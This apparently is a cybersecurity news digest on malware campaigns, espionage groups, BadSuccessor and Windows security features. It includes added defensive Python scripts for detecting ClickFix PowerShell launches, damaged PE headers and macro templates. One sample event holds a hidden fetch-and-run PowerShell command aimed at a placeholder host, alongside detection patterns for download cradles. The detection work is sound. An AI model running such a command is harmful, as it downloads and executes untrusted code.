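The chain above starts with a user pasting a PowerShell command that the ClickFix page hands them, so the first detection opportunity is the process-creation event for that PowerShell launch. The following is an added example written for this digest (not code from Elastic Security Labs or from the page's sources): it scores constructed Sysmon-style process-creation records on a few generic ClickFix traits (PowerShell as a child of explorer.exe, a hidden window, a download cradle, a script host, an encoded command) and raises an alert when two or more coincide. Field names, the sample events and the `.invalid` hostname are all assumptions made for the example.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example; not code from Elastic Security Labs or this page. The events
below are constructed Sysmon-style records (field names are an assumption),
and the hostname is a placeholder in the reserved .invalid TLD.
"""
import re

# A ClickFix lure has the victim paste a command into the Run dialog, so the
# PowerShell process is a child of explorer.exe rather than of a shell or IDE.
INTERACTIVE_PARENTS = ("\\explorer.exe",)
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")

# Each indicator is worth one point; explorer.exe as parent adds another.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|net\.webclient|curl|wget)\b", re.I),
    "script_host": re.compile(r"\b(?:wscript|cscript|mshta)(?:\.exe)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
}
ALERT_THRESHOLD = 2   # one indicator alone is common in benign admin use


def clickfix_indicators(event: dict) -> list[str]:
    """Names of the indicators present in one process-creation event."""
    if not event["image"].lower().endswith(POWERSHELL_IMAGES):
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]
    if event["parent_image"].lower().endswith(INTERACTIVE_PARENTS):
        hits.append("launched_from_explorer")
    return hits


def find_clickfix(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(pid, indicators) for every event scoring at or above ALERT_THRESHOLD."""
    alerts = []
    for ev in events:
        hits = clickfix_indicators(ev)
        if len(hits) >= ALERT_THRESHOLD:
            alerts.append((ev["pid"], hits))
    return alerts


# Constructed sample telemetry: one ClickFix-style launch and two benign ones.
SAMPLE_EVENTS = [
    {   # pasted into Win+R: hidden window, download cradle, script host
        "pid": 4112,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "cmdline": r'powershell -w hidden -c "iwr https://captcha.example.invalid/gverify.js -OutFile $env:TEMP\g.js; wscript $env:TEMP\g.js"',
    },
    {   # benign: user opened an interactive PowerShell window from the Start menu
        "pid": 5120,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
    },
    {   # benign: maintenance script started by the task scheduler service
        "pid": 6004,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\nightly-backup.ps1",
    },
]

if __name__ == "__main__":
    for pid, hits in find_clickfix(SAMPLE_EVENTS):
        print(f"pid {pid}: {', '.join(hits)}")
```

The threshold is the design choice worth tuning: a single indicator (an execution-policy bypass in a scheduled task, or an interactive console launched from the desktop) is everyday noise, whereas the combination of an explorer.exe parent with a hidden window and a download cradle is what a pasted lure looks like. Rerunning it over real Sysmon Event ID 1 data only requires mapping the record fields to the three keys used here.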

Recommended read:
References :
  • Virus Bulletin: Elastic Security Labs has uncovered a novel Rust-based infostealer distributed via Fake CAPTCHA campaigns that trick users into executing a malicious PowerShell script. EDDIESTEALER is hosted on multiple adversary-controlled web properties.
  • The Hacker News: New EDDIESTEALER Malware Bypasses Chrome's App-Bound Encryption to Steal Browser Data
  • www.scworld.com: ClickFix used to spread novel Rust-based infostealer
  • Anonymous :af:: “Prove you're not a robot” — turns into full system breach! Hackers are using fake CAPTCHA checks to deploy a stealthy new Rust malware, EDDIESTEALER, via ClickFix—a social engineering trick abusing PowerShell on Windows
  • securityonline.info: EDDIESTEALER: New Rust Infostealer Uses Fake CAPTCHAs to Hijack Crypto Wallets & Data
  • malware.news: Cybersecurity researchers have identified a sophisticated malware campaign utilizing deceptive CAPTCHA interfaces to distribute EddieStealer, a Rust-based information stealing malware that targets sensitive user data across multiple platforms.
  • cyberpress.org: ClickFix Technique Used by Threat Actors to Spread EddieStealer Malware
  • gbhackers.com: Threat Actors Leverage ClickFix Technique to Deploy EddieStealer Malware

info@thehackernews.com (The Hacker News)@The Hacker News //
A new Windows Remote Access Trojan (RAT) has been discovered that employs a novel technique to evade detection. The malware corrupts its own DOS and PE headers, making it significantly more difficult for security tools to analyze and reconstruct the malicious code. This method obstructs forensic analysis and allows the RAT to operate stealthily on compromised Windows machines for extended periods, in some cases, for weeks before being detected. The FortiGuard Incident Response Team conducted a detailed investigation into this malware.

The Fortinet team managed to obtain a memory dump of the live malware process (dllhost.exe process PID 8200) and a complete 33GB memory dump of the compromised system. By meticulously replicating the compromised environment, they were able to revive the dumped malware in a controlled setting. This allowed them to observe its operations and communication patterns. The researchers had to manually identify the malware's entry point, allocate memory, and resolve API addresses through debugging, address relocation, and parameter adjustments to emulate the malware's behaviour in a lab setting.

Once operational, the malware was found to communicate with a command-and-control (C2) server at rushpapers[.]com over port 443, utilizing TLS encryption. Fortinet analysts identified the malware's use of Windows API functions like SealMessage() and DecryptMessage() to handle encrypted traffic, along with an additional layer of custom encryption. Analysis confirms that the malware is a RAT, allowing attackers to capture screenshots, manipulate system services, and establish connections with other clients.
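Corrupted DOS and PE headers are what forced the Fortinet team to locate the entry point and rebuild the image by hand. The following is an added example for this digest, not code from FortiGuard or the page's sources: a small header sanity check that reports exactly which fields of a carved image are missing or implausible, plus a scan that walks a memory dump page by page and returns the offsets whose headers still parse. The sample images are constructed in the code (a header-only x64 skeleton and a copy with its headers wiped); they are not real binaries.

```python
"""Sanity-check the DOS and PE headers of an image recovered from memory.

Added example, not from the FortiGuard write-up or this page. Malware that
wipes its own headers (as described above) fails these checks, which is a
useful triage signal when carving a process image out of a memory dump.
"""
import struct

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\x00\x00"
KNOWN_MACHINES = {0x014C: "i386", 0x8664: "x86_64", 0xAA64: "arm64"}
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}


def check_pe_headers(image: bytes) -> list[str]:
    """Return a list of header anomalies; an empty list means the headers parse."""
    problems = []
    if len(image) < 0x40:
        return ["image shorter than IMAGE_DOS_HEADER"]
    if image[:2] != IMAGE_DOS_SIGNATURE:
        problems.append("e_magic is not 'MZ'")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if e_lfanew == 0 or e_lfanew + 24 > len(image):
        problems.append(f"e_lfanew 0x{e_lfanew:x} does not point inside the image")
        return problems   # nothing past the DOS header can be trusted
    if image[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        problems.append("missing 'PE\\0\\0' signature at e_lfanew")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", image, e_lfanew + 4)
    if machine not in KNOWN_MACHINES:
        problems.append(f"unknown Machine 0x{machine:04x}")
    if not 1 <= nsections <= 96:
        problems.append(f"implausible NumberOfSections {nsections}")
    opt_off = e_lfanew + 24
    if opt_size < 2 or opt_off + opt_size > len(image):
        problems.append(f"SizeOfOptionalHeader {opt_size} out of range")
    else:
        magic = struct.unpack_from("<H", image, opt_off)[0]
        if magic not in OPTIONAL_MAGIC:
            problems.append(f"unknown optional-header Magic 0x{magic:04x}")
    return problems


def find_images(dump: bytes, page: int = 0x1000) -> list[int]:
    """Offsets of page-aligned images in a dump whose headers pass the checks."""
    return [off for off in range(0, len(dump), page)
            if not check_pe_headers(dump[off:off + 0x400])]


def build_sample_image(corrupt_headers: bool) -> bytes:
    """Constructed minimal x64 image (headers only); not a real binary."""
    e_lfanew = 0x80
    img = bytearray(0x200)
    img[0:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = IMAGE_NT_SIGNATURE
    struct.pack_into("<HHIIIHH", img, e_lfanew + 4, 0x8664, 3, 0, 0, 0, 0xF0, 0x22)
    struct.pack_into("<H", img, e_lfanew + 24, 0x20B)   # PE32+ magic
    if corrupt_headers:
        # Mimic a sample that overwrote its own DOS and NT headers in memory.
        img[0:0x40] = bytes(0x40)
        img[e_lfanew:e_lfanew + 24] = bytes(24)
    return bytes(img)


if __name__ == "__main__":
    print("intact   :", check_pe_headers(build_sample_image(False)))
    print("corrupted:", check_pe_headers(build_sample_image(True)))
    dump = (bytes(0x1000)
            + build_sample_image(False).ljust(0x1000, b"\0")
            + build_sample_image(True).ljust(0x1000, b"\0"))
    print("image offsets:", [hex(o) for o in find_images(dump)])
```

The point of returning a list of reasons rather than a boolean is triage: a page whose only complaint is a missing `MZ` may be an image with a deliberately wiped DOS stub, while a zero `e_lfanew` means the NT headers have to be found some other way (section table heuristics or the entry point from a thread context), which is the manual work the Fortinet write-up describes.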

Recommended read:
References :
  • ciso2ciso.com: New Malware Spotted Corrupts Its Own Headers to Block Analysis – Source:hackread.com
  • hackread.com: New Windows Malware Spotted Corrupts Its Own Headers to Block Analysis
  • The Hacker News: New Windows RAT Evades Detection for Weeks Using Corrupted DOS and PE Headers
  • ciso2ciso.com: The FortiGuard Incident Response Team has released a detailed investigation into a newly discovered malware that managed to quietly operate on a compromised Windows machine for several weeks.

@www.microsoft.com //
References: www.microsoft.com
Microsoft is aggressively integrating artificial intelligence across its products and services, striving to revolutionize the user experience. The company is focused on developing agentic systems that can work independently, proactively identify problems, suggest solutions, and maintain context across interactions. Microsoft envisions a future where AI agents will augment and amplify organizational capabilities, leading to significant transformations in various fields. To facilitate secure and flexible interactions, Microsoft is employing Model Context Protocol (MCP) to enable AI models to interact with external services.

As AI agents become more sophisticated and integrated into business processes, Microsoft recognizes the importance of evolving identity standards. The company is actively working on robust mechanisms to ensure agents can securely access data and act across connected systems, including APIs, code repositories, and enterprise systems. Microsoft emphasizes that industry collaboration on identity standards is crucial for the safe and effective deployment of AI agents.

To aid organizations in safely adopting AI, Microsoft Deputy CISO Yonatan Zunger shares guidance for efficient implementation and defense against evolving identity attack techniques. Microsoft CVP Charles Lamanna offers an AI adoption playbook, emphasizing the importance of "customer obsession" and "extreme ownership" for both startups and large enterprises navigating the age of AI. Lamanna suggests focusing on a few high-impact AI projects instead of spreading resources thinly across numerous pilots.

Recommended read:
References :

@www.helpnetsecurity.com //
A newly identified Russian cyber-espionage group, known as Laundry Bear by Dutch intelligence and Void Blizzard by Microsoft, has been actively targeting Western organizations since at least April 2024. This group is believed to be backed by the Russian government and is primarily focused on gathering intelligence to support Russian strategic interests. Laundry Bear's targets include government entities, defense contractors, aerospace firms, and high-tech businesses in Europe and North America, particularly those supporting Ukraine. The group's activities suggest an interest in sensitive information related to military goods, weapons deliveries, and advanced technologies that are difficult for Russia to acquire due to Western sanctions.

The primary objective of Laundry Bear is to steal sensitive emails and files from compromised systems. They achieve this by targeting cloud-based email environments, specifically Microsoft Exchange. The group employs a range of techniques, including pass-the-cookie attacks, password spraying, and spear phishing aimed at credential theft. Notably, the Dutch intelligence services identified Laundry Bear during an investigation into a credential-stealing attack against the Dutch National Police in September 2024. During this attack, Laundry Bear gained access to an account belonging to a Dutch police employee by using a stolen session cookie to obtain work-related contact information of other police employees.

Microsoft has also observed Laundry Bear targeting critical sectors such as government, defense, transportation, media, NGOs, and healthcare, with a focus on organizations in Europe, North America, NATO member states, and Ukraine. The group frequently gains access by using stolen credentials, likely purchased from online marketplaces. Despite employing relatively simple attack methods and readily available tools, Laundry Bear has achieved a high success rate due to quick-paced cyber operations and efficient automation. Microsoft recommends organizations implement robust security measures to defend against such threats.

Recommended read:
References :
  • The Hacker News: Microsoft has shed light on a previously undocumented cluster of malicious activity originating from a Russia-affiliated threat actor dubbed Void Blizzard (aka Laundry Bear) that it said is attributed to worldwide cloud abuse.
  • www.helpnetsecurity.com: Microsoft, Dutch security agencies lift veil on Laundry Bear cyber espionage group
  • Threats | CyberScoop: New Russian state-sponsored APT quickly gains global reach, hitting expansive targets
  • therecord.media: Recent attacks on institutions in the Netherlands were the work of a previously unknown Russian hacking group that Dutch intelligence agencies are labeling Laundry Bear. Microsoft also reported on the group, naming it Void Blizzard.
  • www.microsoft.com: Microsoft Threat Intelligence has discovered a cluster of worldwide cloud abuse activity conducted by a threat actor we track as Void Blizzard, who we assess with high confidence is Russia-affiliated and has been active since at least April 2024. Void Blizzard’s cyberespionage operations tend to be highly targeted at specific organizations of interest to Russia, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America. The post appeared first on Microsoft Security Blog.
  • www.defensie.nl: Unknown Russian group behind hacks of Dutch targets - "is behind the hacks on several Dutch organizations, including the police in September 2024.
  • Help Net Security: Microsoft, Dutch security agencies lift veil on Laundry Bear cyber espionage group
  • thecyberexpress.com: New Russian Cyber Threat ‘Laundry Bear’ Hits Western Targets
  • www.csoonline.com: New Russian APT group Void Blizzard targets NATO-based orgs after infiltrating Dutch police
  • The Register - Security: New Russian cyber-spy crew Laundry Bear joins the email-stealing pack
  • securityonline.info: Void Blizzard: New Russian Cyberespionage Group Targets NATO and Ukraine
  • securityaffairs.com: Russia-linked APT Laundry Bear linked to 2024 Dutch Police attack
  • industrialcyber.co: Microsoft details Void Blizzard as Russian cyber threat targeting global critical infrastructure
  • Virus Bulletin: Microsoft Threat Intelligence, in collaboration with Dutch security organizations AIVD & MIVD, observed Void Blizzard (a.k.a. LAUNDRY BEAR) conducting espionage operations primarily targeting organizations that are important to Russian government objectives.
  • Industrial Cyber: Microsoft details Void Blizzard as Russian cyber threat targeting global critical infrastructure
  • www.cybersecuritydive.com: Microsoft, Dutch government spot new Russian hacking group targeting critical infrastructure
  • Metacurity: Russian group Laundry Bear hacked Dutch police, targets Ukraine-allied nations
  • www.metacurity.com: Russian group Laundry Bear hacked Dutch police, targets Ukraine-allied nations
  • Vulnerable U: Void Blizzard hackers raid NATO cloud tenants with Evilginx phishing
  • Danny Palmer: A new Russian APT (LAUNDRY BEAR) is tearing through defence and government entities in NATO member states using stripped back and heavily automated threat techniques that nonetheless went widely undetected until they were spotted by the Dutch police, the Netherlands’s security services revealed.
  • The Record: Recent attacks on institutions in the Netherlands were the work of a previously unknown Russian hacking group that Dutch intelligence agencies are labeling Laundry Bear. Microsoft also reported on the group, naming it Void Blizzard.
  • www.scworld.com: Russian hackers Void Blizzard step up espionage campaign
  • The Hacker News: Russia-Linked Hackers Target Tajikistan Government with Weaponized Word Documents

Ddos@securityonline.info //
A new cyber-espionage campaign has been uncovered, targeting public sector organizations in Tajikistan. The threat actor behind this campaign is TAG-110, a group linked to Russia and also known as UAC-0063 and APT28 (BlueDelta). Recorded Future’s Insikt Group discovered that TAG-110 is using macro-enabled Microsoft Word templates (.dotm files) to gain access to and exfiltrate intelligence from Tajik government, educational, and research institutions, particularly those involved in military affairs or electoral processes. This campaign reflects Russia’s strategic interest in Central Asia through intelligence-gathering operations.

These malicious Word templates are deployed through phishing lures disguised as official Tajik government documents. The templates are saved in the Microsoft Word STARTUP folder, ensuring automatic execution each time Word is launched. This tactic represents a shift from TAG-110’s previous use of HTA-based payloads like HATVIBE. The two malicious documents identified are themed around radiation safety for Tajikistan’s armed forces and election schedules in Dushanbe.

Upon execution, the embedded VBA macros collect system metadata such as username, computer name, language, and resolution. This data is then sent to a hardcoded command-and-control (C2) server. The macros also establish persistence by copying themselves to the %APPDATA%\Microsoft\Word\STARTUP\ directory. Researchers state that this evolution highlights a tactical shift prioritizing persistence. The use of .dotm files and VBA macros allows TAG-110 to maintain a stealthy presence and collect data from compromised systems, turning them into surveillance nodes.
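Because every template in the Word STARTUP folder loads when Word starts, that folder is a small, well-defined place to audit on endpoints. The following is an added example for this digest (not code from Recorded Future's Insikt Group or the page's sources): it lists files in a STARTUP directory that carry a macro-enabled extension or, regardless of extension, an OOXML `word/vbaProject.bin` part, and it builds a constructed sample folder so the scan can be exercised offline. The `%APPDATA%\Microsoft\Word\STARTUP\` path comes from the report above; the sample file names are placeholders.

```python
r"""Audit the Word STARTUP folder for macro-bearing templates.

Added defender-side example; not code from Recorded Future or this page.
Anything in %APPDATA%\Microsoft\Word\STARTUP\ loads every time Word starts,
so a macro-enabled template there deserves a look. File names in the
constructed sample folder are placeholders.
"""
import os
import tempfile
import zipfile
from pathlib import Path

MACRO_PART = "word/vbaProject.bin"   # OOXML part that holds compiled VBA


def default_startup_dir() -> Path:
    """Per-user STARTUP path named in the report (APPDATA is unset off Windows)."""
    return Path(os.environ.get("APPDATA", "")) / "Microsoft" / "Word" / "STARTUP"


def has_vba_project(path: Path) -> bool:
    """True if an OOXML package carries a vbaProject.bin part."""
    if not zipfile.is_zipfile(path):
        return False
    with zipfile.ZipFile(path) as zf:
        return MACRO_PART in zf.namelist()


def classify(entry: Path) -> list[str]:
    """Reasons a file in STARTUP deserves review; empty means nothing notable."""
    reasons = []
    suffix = entry.suffix.lower()
    if suffix in {".dotm", ".docm"}:
        reasons.append("macro-enabled extension")
    elif suffix == ".dot":
        reasons.append("legacy binary template (may embed VBA)")
    if has_vba_project(entry):          # catches a renamed .dotm as well
        reasons.append(f"contains {MACRO_PART}")
    return reasons


def scan_word_startup(startup_dir: Path) -> list[dict]:
    """Every file in the folder that has at least one review reason."""
    if not startup_dir.is_dir():
        return []
    findings = []
    for entry in sorted(startup_dir.iterdir()):
        if entry.is_file():
            reasons = classify(entry)
            if reasons:
                findings.append({"file": entry.name,
                                 "size": entry.stat().st_size,
                                 "reasons": reasons})
    return findings


def build_sample_startup(root: Path) -> Path:
    """Constructed STARTUP folder: one macro template, one clean template, one stray file."""
    startup = root / "Microsoft" / "Word" / "STARTUP"
    startup.mkdir(parents=True)
    with zipfile.ZipFile(startup / "sample_macro_template.dotm", "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(MACRO_PART, b"\xd0\xcf\x11\xe0 placeholder, not real VBA")
    with zipfile.ZipFile(startup / "clean_template.dotx", "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
    (startup / "notes.txt").write_text("not a template")
    return startup


def demo() -> list[dict]:
    """Run the scan against the constructed folder and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_word_startup(build_sample_startup(Path(tmp)))


if __name__ == "__main__":
    for finding in demo():
        print("sample:", finding)
    for finding in scan_word_startup(default_startup_dir()):
        print("live  :", finding)
```

On a Windows host the `__main__` block also scans the real per-user folder; on a fleet, the same function run under an EDR script or scheduled job and diffed against a known-good inventory turns a newly appearing `.dotm` into an alert rather than something discovered after the fact.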

Recommended read:
References :
  • securityonline.info: Russian-Aligned TAG-110 Targets Tajikistan Governments with Stealthy Cyber-Espionage
  • cyberpress.org: TAG-110 Hackers Use Malicious Word Templates for Targeted Attacks
  • gbhackers.com: TAG-110 Hackers Deploy Malicious Word Templates in Targeted Attacks
  • The Hacker News: The Russia-aligned threat actor known as TAG-110 has been observed conducting a spear-phishing campaign targeting Tajikistan using macro-enabled Word templates as an initial payload.

Dhara Shrivastava@cysecurity.news //
Marks & Spencer (M&S) and Co-op, major UK retailers, have been hit by a Scattered Spider cyberattack involving DragonForce ransomware. The attack has caused weeks-long disruptions, impacting online transactions and the availability of food, fashion, and home goods. M&S warns that the disruption to online transactions could last until July. The cybercrime gang Scattered Spider is also believed to be behind attacks on other UK retailers, including Harrods.

The financial impact on M&S is expected to be significant. The company anticipates the cyberattack will cut $400 million from its profits and reported losing over £40 million in weekly sales since the attack began over the Easter bank holiday weekend. As a precaution, M&S took down some of its systems, resulting in short-term disruptions. This decision was made to protect its systems, customers, and partners from further compromise.

In response to the attack, M&S plans to accelerate its technology improvement plan, shortening the timeframe from two years to six months. This reflects the urgent need to bolster its cybersecurity defenses and prevent future disruptions. The company previously outlined plans in 2023 to improve its technology stack, including investments in infrastructure, network connectivity, store technology, and supply-chain systems. M&S acknowledged that personal data of customers had been stolen, including names, dates of birth, telephone numbers, home and email addresses, and online order histories. However, the retailer insisted that the data theft did not include usable card, payment, or login information.

Recommended read:
References :
  • www.cysecurity.news: Scattered Spider Cyberattack Cripples M&S, Co-op: DragonForce Ransomware Causes Weeks-Long Disruption
  • www.cybersecuritydive.com: M&S warns April cyberattack will cut $400 million from profits
  • Tech Monitor: Marks & Spencer faces £300m impact on profit from cyberattack
  • techxplore.com: Marks & Spencer cyberattack: How can retailers regain customers' trust after a hack?

@www.microsoft.com //
Microsoft is taking a significant step towards future-proofing cybersecurity by integrating post-quantum cryptography (PQC) into Windows Insider builds. This move aims to protect data against the potential threat of quantum computers, which could render current encryption methods vulnerable. The integration of PQC is a critical step toward quantum-resilient cybersecurity, ensuring that Windows systems can withstand attacks from more advanced computing power in the future.

Microsoft announced the availability of PQC support in Windows Insider Canary builds (27852 and above). This release allows developers and organizations to begin experimenting with PQC in real-world environments, assessing integration challenges, performance trade-offs, and compatibility. This is being done in an attempt to jump-start what’s likely to be the most formidable and important technology transition in modern history.

The urgency behind this transition stems from the "harvest now, decrypt later" threat, where malicious actors store encrypted communications today, with the intent to decrypt them once quantum computers become capable. These captured secrets, such as passwords, encryption keys, or medical data, could remain valuable to attackers for years to come. By adopting PQC algorithms, Microsoft aims to safeguard sensitive information against this future risk, emphasizing the importance of starting the transition now.

Recommended read:
References :
  • cyberinsider.com: Microsoft has begun integrating post-quantum cryptography (PQC) into Windows Insider builds, marking a critical step toward quantum-resilient cybersecurity. Microsoft announced the availability of PQC support in Windows Insider Canary builds (27852 and above). This release allows developers and organizations to begin experimenting with PQC in real-world environments, assessing integration challenges, performance trade-offs, and compatibility with …
  • Dan Goodin: Microsoft is updating Windows 11 with a set of new encryption algorithms that can withstand future attacks from quantum computers in an attempt to jump-start what’s likely to be the most formidable and important technology transition in modern history.
  • Red Hat Security: In their article on post-quantum cryptography, Emily Fox and Simo Sorce explained how Red Hat is integrating post-quantum cryptography (PQC) into our products. PQC protects confidentiality, integrity and authenticity of communication and data against quantum computers, which will make attacks on existing classic cryptographic algorithms such as RSA and elliptic curves feasible. Cryptographically relevant quantum computers (CRQCs) are not known to exist yet, but continued advances in research point to a future risk of successful attacks. While the migration to algorithms resistant against such
  • medium.com: Post-Quantum Cryptography Is Arriving on Windows & Linux
  • www.microsoft.com: The recent advances in quantum computing offer many advantages—but also challenge current cryptographic strategies. Learn how FrodoKEM could help strengthen security, even in a future with powerful quantum computers. The post first appeared on .
  • arstechnica.com: For the first time, new quantum-safe algorithms can be invoked using standard Windows APIs.

info@thehackernews.com (The Hacker News)@The Hacker News //
A critical privilege escalation vulnerability has been discovered in the delegated Managed Service Account (dMSA) feature of Windows Server 2025's Active Directory. This flaw, dubbed "BadSuccessor," allows attackers with minimal permissions, specifically the ability to create objects inside an Active Directory organizational unit, to gain control over any user in the Active Directory domain, including Domain Admins. The vulnerability stems from improper permission handling during dMSA migration, where unauthorized users can simulate a migration process and inherit permissions of other accounts, even those with Domain Admin privileges. Security researchers have detailed that only write permissions over the attributes of a dMSA are required to execute this attack.

Microsoft has acknowledged the "BadSuccessor" issue in Windows Server 2025 but has rated it as moderate severity, sparking disagreement from security researchers who believe it poses a significant risk. Currently, there is no official patch available from Microsoft to address this vulnerability. This lack of an immediate patch has led security firms such as Akamai to document the privilege escalation flaw, emphasizing the potential for attackers to fully compromise an Active Directory domain by exploiting the dMSA feature. Akamai researchers found that in 91% of the environments they examined, users outside the domain admins group had the required permissions to perform this attack.

Organizations utilizing Active Directory are strongly advised to be aware of this vulnerability and actively monitor for suspicious activity related to dMSA objects. Security researchers are suggesting workarounds to mitigate the risk until Microsoft releases a formal patch. The core of the attack involves abusing the dMSA feature to elevate privileges, highlighting the importance of carefully reviewing and restricting permissions related to dMSA creation and management. Furthermore, the discovery of this vulnerability emphasizes the need for organizations to stay informed about the latest security research and apply necessary security measures to protect their Active Directory environments.

Recommended read:
References :
  • thecyberexpress.com: Active Directory dMSA Privilege Escalation Attack Detailed by Researchers
  • Davey Winder: New Windows Server 2025 Attack Compromises Any Active Directory User
  • The Hacker News: Critical Windows Server 2025 dMSA Vulnerability Enables Active Directory Compromise
  • www.csoonline.com: BadSuccessor: Unpatched Microsoft Active Directory attack enables domain takeover
  • Help Net Security: A privilege escalation vulnerability in Windows Server 2025 can be used by attackers to compromise any user in Active Directory (AD), including Domain Admins.
  • hackplayers: BadSuccessor: privilege escalation abusing dMSA in Active Directory
  • www.helpnetsecurity.com: Unpatched Windows Server vulnerability allows full domain compromise
  • borncity.com: BadSuccessor: Abusing dMSA to elevate privileges in Active Directory
  • www.scworld.com: Details - Cyber Security News
  • hackread.com: BadSuccessor Exploits Windows Server 2025 Flaw for Full AD Takeover
  • Assura, Inc.: Cyber Heads Up: “BadSuccessor”—A Critical Active Directory Privilege Escalation Vulnerability in Windows Server 2025
  • www.assurainc.com: Cyber Heads Up: “BadSuccessor”—A Critical Active Directory Privilege Escalation Vulnerability in Windows Server 2025
  • securityboulevard.com: Cyber Heads Up: “BadSuccessor”—A Critical Active Directory Privilege Escalation Vulnerability in Windows Server 2025
  • ciso2ciso.com: Cyber Heads Up: “BadSuccessor”—A Critical Active Directory Privilege Escalation Vulnerability in Windows Server 2025 – Source: securityboulevard.com
  • gbhackers.com: SharpSuccessor PoC Released to Weaponize Windows Server 2025 BadSuccessor Flaw
  • cyberpress.org: SharpSuccessor: Weaponizing Windows Server 2025 BadSuccessor Vulnerability
  • securityonline.info: Windows Server 2025 “BadSuccessor” Flaw Allows Domain Takeover (PoC Available, No Patch)
  • securityonline.info: Akamai security researcher Yuval Gordon has uncovered an Active Directory privilege escalation vulnerability in Windows Server 2025, revealing
  • Cyber Security News: Critical privilege escalation vulnerability in Windows Server 2025’s Active Directory infrastructure has been weaponized through a new proof-of-concept tool called SharpSuccessor
  • gbhackers.com: A critical privilege escalation vulnerability in Windows Server 2025’s delegated Managed Service Account (dMSA) feature enables attackers to compromise Active Directory domains using tools like SharpSuccessor.
  • SOC Prime Blog: BadSuccessor Detection: Critical Windows Server Vulnerability Can Compromise Any User in Active Directory

@arstechnica.com //
Signal, the privacy-focused messaging application, has taken action to block Microsoft's controversial Recall feature from capturing screenshots of its desktop app content on Windows 11. Citing privacy concerns over Recall's ability to automatically take screenshots of on-screen activity, Signal has implemented a "screen security" setting, enabled by default, that leverages Digital Rights Management (DRM) to prevent the tool from accessing and recording private conversations. This move comes as Signal expresses discontent with Microsoft's approach, arguing that Recall lacks sufficient developer controls to exclude specific apps and protect sensitive information.

Microsoft's Recall feature, designed for Copilot+ PCs, works by continuously taking screenshots and creating a searchable database of user activity. Signal argues that this poses a significant risk to the privacy of its users, as private conversations could be inadvertently captured and stored. By implementing DRM, Signal sets a flag on its application window that instructs Recall, and any other screenshotting application, to ignore its content. While Signal acknowledges this is a blunt tool that may interfere with accessibility software, it believes Microsoft left them with no other choice.

Signal has criticized Microsoft for not providing developers with the necessary tools to manage how Recall interacts with their applications. The messaging app argues that it shouldn't have to resort to using DRM "content protection hacks" to safeguard user privacy. Signal hopes that AI teams building systems like Recall will carefully consider the privacy implications and avoid forcing apps to use workarounds to protect the integrity of their services. They want the AI teams to know that this will potentially affect accessibility options like screen readers.

Recommended read:
References :
  • security – Ars Technica: “Microsoft has simply given us no other option,” Signal says as it blocks Windows Recall
  • The Register - Software: Signal shuts the blinds on Microsoft Recall with the power of DRM
  • www.techradar.com: Signal blasts Microsoft over Recall privacy failings, as secure messaging app is forced to fudge a way of blocking the controversial Windows 11 feature
  • Dropsafe: By Default, Signal Doesn’t Recall | Signal Windows app leverages DRM content protection hacks to hide messages from Windows Recall
  • Dan Goodin: Signal writes: "We hope that the AI teams building systems like Recall will think through these implications more carefully in the future. Apps like Signal shouldn’t have to implement “one weird trick” in order to maintain the privacy and integrity of their services without proper developer tools. People who care about privacy shouldn’t be forced to sacrifice accessibility upon the altar of AI aspirations either."
  • www.bleepingcomputer.com: Signal now blocks Microsoft Recall screenshots on Windows 11
  • CyberInsider: Signal Deploys Countermeasure to Shield Messages from Windows Recall
  • securityaffairs.com: New Signal update stops Windows from capturing user chats
  • Schneier on Security: Signal Blocks Windows Recall
  • cyberinsider.com: Signal Deploys Countermeasure to Shield Messages from Windows Recall